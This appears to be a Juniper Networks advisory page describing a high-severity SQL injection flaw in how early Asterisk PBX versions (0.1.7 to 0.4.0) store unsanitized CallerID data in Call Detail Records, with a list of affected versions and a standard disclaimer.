Title: Asterisk CallerID Call Detail Records SQL Injection Vulnerability
Severity: HIGH
Description:
Asterisk is a software-based PBX system, which is available for Linux operating systems. Asterisk includes support for various protocols including SIP, IAX v1 and v2, and H323. It is back-ended by a relational database.
Call Detail Records (CDR) are used by telephone systems to record various user data. This includes a variety of information, such as the CallerID data.
Asterisk is prone to SQL injection attacks via malformed CDR data. The vulnerability occurs due to insufficient sanitization of user-supplied CallerID data and could allow for the execution of SQL commands on the system hosting Asterisk. This could potentially be exploited by an attacker to influence the logic of SQL queries or to exploit vulnerabilities in the underlying database. Other attacks may also be possible.
For an attacker to exploit this issue, it would have to be possible for them to modify the CallerID data sent out by their phone system.
Affected Products:
- Asterisk Asterisk 0.1.7
- Asterisk Asterisk 0.1.8
- Asterisk Asterisk 0.1.9
- Asterisk Asterisk 0.1.9 -1
- Asterisk Asterisk 0.2.0
- Asterisk Asterisk 0.3.0
- Asterisk Asterisk 0.4.0
Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.
